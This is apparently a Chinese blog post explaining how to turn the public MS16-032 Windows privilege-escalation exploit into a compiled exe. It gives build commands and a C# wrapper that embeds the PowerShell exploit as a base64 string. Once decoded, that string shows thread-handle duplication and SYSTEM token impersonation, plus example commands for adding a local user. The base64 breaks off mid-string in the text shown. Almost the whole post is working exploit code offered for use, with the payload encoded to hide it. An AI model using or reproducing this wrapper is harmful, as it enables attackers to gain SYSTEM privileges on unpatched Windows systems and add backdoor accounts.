授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
  class Program
  {
    static string _application;
    static string _commandline;
    static int Main(string[] args)
    {
       if (args.Length == 0)
      {
        System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c clac.exe\"");
        return 1;
      }
       else if (args.Length ==1)
      {

        _application = args[0];     
        PowerShellExecutor t = new PowerShellExecutor();
        t.ExecuteSynchronously(_application, "");
      }
      else if(args.Length == 2)
      {
        _application = args[0];
        _commandline = args[1];
        PowerShellExecutor t = new PowerShellExecutor();
        t.ExecuteSynchronously(_application, _commandline);
      }
      return 0;
      
    }
  }

  class PowerShellExecutor
  {
    public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsKPCMKLlNZTk9QU0lTCiAgICAKICAgIFBvd2VyU2hlbGwgaW1wbGVtZW50YXRpb24gb2YgTVMxNi0wMzIuIFRoZSBleHBsb2l0IHRhcmdldHMgYWxsIHZ1bG5lcmFibGUKICAgIG9wZXJhdGluZyBzeXN0ZW1zIHRoYXQgc3VwcG9ydCBQb3dlclNoZWxsIHYyKy4gQ3JlZGl0IGZvciB0aGUgZGlzY292ZXJ5IG9mCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4KICAgIAogICAgVGFyZ2V0czoKICAgIAogICAgKiBXaW43LVdpbjEwICYgMms4LTJrMTIgPD09IDMyLzY0IGJpdCEKICAgICogVGVzdGVkIG9uIHgzMiBXaW43LCB4NjQgV2luOCwgeDY0IDJrMTJSMgogICAgCiAgICBOb3RlczoKICAgIAogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQogICAgICBjb3Jlcy4gSWYgdGVzdGluZyBpbiBhIFZNIGp1c3QgbWFrZSBzdXJlIHRvIGFkZCBhIGNvcmUgaWYgbmVlZGVkIG1rYXkuCiAgICAqIFRoZSBleHBsb2l0IGlzIHByZXR0eSByZWxpYWJsZSwgaG93ZXZlciB+MS82IHRpbWVzIGl0IHdpbGwgc2F5IGl0IHN1Y2NlZWRlZAogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQogICAgKiBXYW50IHRvIGtub3cgbW9yZSBhYm91dCBNUzE2LTAzMiA9PT4KICAgICAgaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jby51ay8yMDE2LzAzL2V4cGxvaXRpbmctbGVha2VkLXRocmVhZC1oYW5kbGUuaHRtbAoKLkRFU0NSSVBUSU9OCiAgICBBdXRob3I6IFJ1YmVuIEJvb25lbiAoQEZ1enp5U2VjKQogICAgQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8KICAgIExpY2Vuc2U6IEJTRCAzLUNsYXVzZQogICAgUmVxdWlyZWQgRGVwZW5kZW5jaWVzOiBQb3dlclNoZWxsIHYyKwogICAgT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lCgouUEFSQU1FVEVSIEFwcGxpY2F0aW9uCgpTcGVjaWZpZXMgYW4gQXBwbGljYXRpb24gdG8gcnVuLgoKLlBBUkFNRVRFUiBDb21tYW5kbGluZQoKU3BlY2lmaWVzIENvbW1hbmRsaW5lLCBzdWNoIGFzIG5ldCB1c2VyIHh4eCB4eHggL2FkZAogICAgCi5FWEFNUExFCiAgICBDOlxQUz4gSW52b2tlLU1TMTYtMDMyIC1BcHBsaWNhdGlvbiBDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUKICAgIEM6XFBTPiBJbnZva2UtTVMxNi0wMzIgLUFwcGxpY2F0aW9uIEM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSAtQ29tbWFuZGxpbmUgIi9jIG5ldCB1c2VyIDEgMSAvYWRkIgoKIz4KICBbQ21kbGV0QmluZGluZygpXQogICAgcGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkRmFsc2UsIFBhcmFtZXRlclNldE5hbWUgPSAnQzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlJyApXQogICAgICAgIFtzdHJpbmddCiAgICAgICAgJEFwcGxpY2F0aW9uLAoKICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW3N0cmluZ10KICAgICAgICAkQ29tbWFuZGxpbmUKICAgICAgICApCgoKICAgIEFkZC1UeXBlIC1UeXBlRGVmaW5pdGlvbiBAIgogICAgdXNpbmcgU3lzdGVtOwogICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsKICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9OCiAgICB7CiAgICAgICAgcHVibGljIEludFB0ciBoUHJvY2VzczsKICAgICAgICBwdWJsaWMgSW50UHRyIGhUaHJlYWQ7CiAgICAgICAgcHVibGljIGludCBkd1Byb2Nlc3NJZDsKICAgICAgICBwdWJsaWMgaW50IGR3VGhyZWFkSWQ7CiAgICB9CiAgICAKICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsLCBDaGFyU2V0PUNoYXJTZXQuVW5pY29kZSldCiAgICBwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPCiAgICB7CiAgICAgICAgcHVibGljIEludDMyIGNiOwogICAgICAgIHB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwRGVza3RvcDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwVGl0bGU7CiAgICAgICAgcHVibGljIEludDMyIGR3WDsKICAgICAgICBwdWJsaWMgSW50MzIgZHdZOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7CiAgICAgICAgcHVibGljIEludDMyIGR3RmxhZ3M7CiAgICAgICAgcHVibGljIEludDE2IHdTaG93V2luZG93OwogICAgICAgIHB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsKICAgICAgICBwdWJsaWMgSW50UHRyIGxwUmVzZXJ2ZWQyOwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZElucHV0OwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsKICAgICAgICBwdWJsaWMgSW50UHRyIGhTdGRFcnJvcjsKICAgIH0KICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBTUU9TCiAgICB7CiAgICAgICAgcHVibGljIGludCBMZW5ndGg7CiAgICAgICAgcHVibGljIGludCBJbXBlcnNvbmF0aW9uTGV2ZWw7CiAgICAgICAgcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOwogICAgICAgIHB1YmxpYyBib29sIEVmZmVjdGl2ZU9ubHk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgQWR2YXBpMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcoCiAgICAgICAgICAgIFN0cmluZyB1c2VyTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGRvbWFpbiwKICAgICAgICAgICAgU3RyaW5nIHBhc3N3b3JkLAogICAgICAgICAgICBpbnQgbG9nb25GbGFncywKICAgICAgICAgICAgU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGNvbW1hbmRMaW5lLAogICAgICAgICAgICBpbnQgY3JlYXRpb25GbGFncywKICAgICAgICAgICAgaW50IGVudmlyb25tZW50LAogICAgICAgICAgICBTdHJpbmcgY3VycmVudERpcmVjdG9yeSwKICAgICAgICAgICAgcmVmICBTVEFSVFVQSU5GTyBzdGFydHVwSW5mbywKICAgICAgICAgICAgb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oCiAgICAgICAgICAgIHJlZiBJbnRQdHIgVGhyZWFkLAogICAgICAgICAgICBJbnRQdHIgVG9rZW4pOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuVGhyZWFkVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICBib29sIE9wZW5Bc1NlbGYsCiAgICAgICAgICAgIG91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKAogICAgICAgICAgICBJbnRQdHIgUHJvY2Vzc0hhbmRsZSwgCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICByZWYgSW50UHRyIFRva2VuSGFuZGxlKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBFeGlzdGluZ1Rva2VuSGFuZGxlLAogICAgICAgICAgICBpbnQgU0VDVVJJVFlfSU1QRVJTT05BVElPTl9MRVZFTCwKICAgICAgICAgICAgcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOwogICAgICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKAogICAgICAgICAgICBJbnRQdHIgaFByb2Nlc3MsCiAgICAgICAgICAgIHVpbnQgdUV4aXRDb2RlKTsKICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENsb3NlSGFuZGxlKEludFB0ciBoT2JqZWN0KTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBEdXBsaWNhdGVIYW5kbGUoCiAgICAgICAgICAgIEludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgSW50UHRyIGhTb3VyY2VIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBoVGFyZ2V0UHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3RGVzaXJlZEFjY2VzcywKICAgICAgICAgICAgYm9vbCBiSW5oZXJpdEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3T3B0aW9ucyk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJudGRsbC5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRUb0ltcGVyc29uYXRlLAogICAgICAgICAgICByZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOwogICAgfQoiQAoKICAgIGZ1bmN0aW9uIEdldC1UaHJlYWRIYW5kbGUgewogICAgICAgICMgU3RhcnR1cEluZm8gU3RydWN0CiAgICAgICAgJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTwogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5oU3RkT3V0cHV0ID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpCiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRFcnJvciA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUKICAgICAgICAKICAgICAgICAjIFByb2Nlc3NJbmZvIFN0cnVjdAogICAgICAgICRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTgogICAgICAgIAogICAgICAgICMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQogICAgICAgICRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQogICAgICAgIAogICAgICAgICMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKAogICAgICAgICAgICAidXNlciIsICJkb21haW4iLCAicGFzcyIsCiAgICAgICAgICAgIDB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXG5vdGVwYWQuZXhlIiwgIiIsCiAgICAgICAgICAgIDB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsCiAgICAgICAgICAgIFtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykKICAgICAgICAKICAgICAgICAjIER1cGxpY2F0ZSBoYW5kbGUgaW50byBjdXJyZW50IHByb2Nlc3MgLT4gRFVQTElDQVRFX1NBTUVfQUNDRVNTCiAgICAgICAgJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8KICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OkR1cGxpY2F0ZUhhbmRsZSgKICAgICAgICAgICAgJFByb2Nlc3NJbmZvLmhQcm9jZXNzLCAweDQsCiAgICAgICAgICAgIFtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksCiAgICAgICAgICAgIFtyZWZdJGxwVGFyZ2V0SGFuZGxlLCAwLCAkZmFsc2UsCiAgICAgICAgICAgIDB4MDAwMDAwMDIpCiAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICAKICAgICAgICAkbHBUYXJnZXRIYW5kbGUKICAgIH0KICAgIAogICAgZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsKICAgICAgICBlY2hvICJgbls/XSBUcnlpbmcgdGhyZWFkIGhhbmRsZTogJFRocmVhZCIKICAgICAgICBlY2hvICJbP10gVGhyZWFkIGJlbG9uZ3MgdG86ICQoJChHZXQtUHJvY2VzcyAtUElEICQoW0tlcm5lbDMyXTo6R2V0UHJvY2Vzc0lkT2ZUaHJlYWQoJFRocmVhZCkpKS5Qcm9jZXNzTmFtZSkiCiAgICAKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlN1c3BlbmRUaHJlYWQoJFRocmVhZCkKICAgICAgICBpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsKICAgICAgICAgICAgZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfSBlY2hvICJbK10gVGhyZWFkIHN1c3BlbmRlZCIKICAgICAgICAKICAgICAgICBlY2hvICJbPl0gV2lwaW5nIGN1cnJlbnQgaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgW0ludFB0cl06Olplcm8pCiAgICAgICAgaWYgKCEkQ2FsbFJlc3VsdCkgewogICAgICAgICAgICBlY2hvICJbIV0gU2V0VGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls+XSBCdWlsZGluZyBTWVNURU0gaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAjIFNlY3VyaXR5UXVhbGl0eU9mU2VydmljZSBzdHJ1Y3QKICAgICAgICAkU1FPUyA9IE5ldy1PYmplY3QgU1FPUwogICAgICAgICRTUU9TLkltcGVyc29uYXRpb25MZXZlbCA9IDIgI1NlY3VyaXR5SW1wZXJzb25hdGlvbgogICAgICAgICRTUU9TLkxlbmd0aCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU1FPUykKICAgICAgICAjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWljcm9zb2Z0IDspCiAgICAgICAgJENhbGxSZXN1bHQgPSBbTnRkbGxdOjpOdEltcGVyc29uYXRlVGhyZWFkKCRUaHJlYWQsICRUaHJlYWQsIFtyZWZdJHNxb3MpCiAgICAgICAgaWYgKCRDYWxsUmVzdWx0IC1uZSAwKSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRUaHJlYWQpCiAgICAgICAgICAgIGVjaG8gIlsrXSBUaHJlYWQgcmVzdW1lZCEiCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgIAogICAgICAgICRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICMgMHgwMDA2IC0tPiBUT0tFTl9EVVBMSUNBVEUgLWJvciBUT0tFTl9JTVBFUlNPTkFURQogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblRocmVhZFRva2VuKCRUaHJlYWQsIDB4MDAwNiwgJGZhbHNlLCBbcmVmXSRTeXNUb2tlbkhhbmRsZSkKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBPcGVuVGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls/XSBTdWNjZXNzLCBvcGVuIFNZU1RFTSB0b2tlbiBoYW5kbGU6ICRTeXNUb2tlbkhhbmRsZSIKICAgICAgICBlY2hvICJbK10gUmVzdW1pbmcgdGhyZWFkLi4iCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgIH0KICAgIAogICAgIyBtYWluKCkgPC0tLSA7KQogICAgJG1zMTYwMzIgPSBAIgogICAgIF9fIF9fIF9fXyBfX18gICBfX18gICAgIF9fXyBfX18gX19fIAogICAgfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfAogICAgfCAgICAgfF8gIHxffCB8X3wgLiB8X19ffCB8IHxfICB8ICBffAogICAgfF98X3xffF9fX3xfX19fX3xfX198ICAgfF9fX3xfX198X19ffAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICBbYnkgYjMzZiAtPiBARnV6enlTZWNdCiJACiAgICAKICAgICRtczE2MDMyCiAgICAKICAgICMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrCiAgICBlY2hvICJgbls/XSBPcGVyYXRpbmcgc3lzdGVtIGNvcmUgY291bnQ6ICQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSIKICAgIGlmICgkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkgLWx0IDIpIHsKICAgICAgICBlY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiIKICAgICAgICBSZXR1cm4KICAgIH0KICAgIAogICAgIyBDcmVhdGUgYXJyYXkgZm9yIFRocmVhZHMgJiBUSUQncwogICAgJFRocmVhZEFycmF5ID0gQCgpCiAgICAkVGlkQXJyYXkgPSBAKCkKICAgIAogICAgZWNobyAiWz5dIER1cGxpY2F0aW5nIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIGhhbmRsZXMuLiIKICAgICMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQKICAgIGZvciAoJGk9MDsgJGkgLWx0IDUwMDsgJGkrKykgewogICAgICAgICRoVGhyZWFkID0gR2V0LVRocmVhZEhhbmRsZQogICAgICAgICRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkKICAgICAgICAjIEJpdCBoYWNreS9sYXp5LCBmaWx0ZXJzIG9uIHVuaXEvdmFsaWQgVElEJ3MgdG8gY3JlYXRlICRUaHJlYWRBcnJheQogICAgICAgIGlmICgkVGlkQXJyYXkgLW5vdGNvbnRhaW5zICRoVGhyZWFkSUQpIHsKICAgICAgICAgICAgJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQKICAgICAgICAgICAgaWYgKCRoVGhyZWFkIC1uZSAwKSB7CiAgICAgICAgICAgICAgICAkVGhyZWFkQXJyYXkgKz0gJGhUaHJlYWQgIyBUaGlzIGlzIHdoYXQgd2UgbmVlZCEKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIAogICAgaWYgKCQoJFRocmVhZEFycmF5Lmxlbmd0aCkgLWVxIDApIHsKICAgICAgICBlY2hvICJbIV0gTm8gdmFsaWQgdGhyZWFkIGhhbmRsZXMgd2VyZSBjYXB0dXJlZCwgZXhpdGluZyEiCiAgICAgICAgUmV0dXJuCiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIls/XSBEb25lLCBnb3QgJCgkVGhyZWFkQXJyYXkubGVuZ3RoKSB0aHJlYWQgaGFuZGxlKHMpISIKICAgICAgICBlY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6IgogICAgICAgICRUaHJlYWRBcnJheQogICAgfQogICAgCiAgICBlY2hvICJgblsqXSBTbmlmZmluZyBvdXQgcHJpdmlsZWdlZCBpbXBlcnNvbmF0aW9uIHRva2VuLi4iCiAgICBmb3JlYWNoICgkVGhyZWFk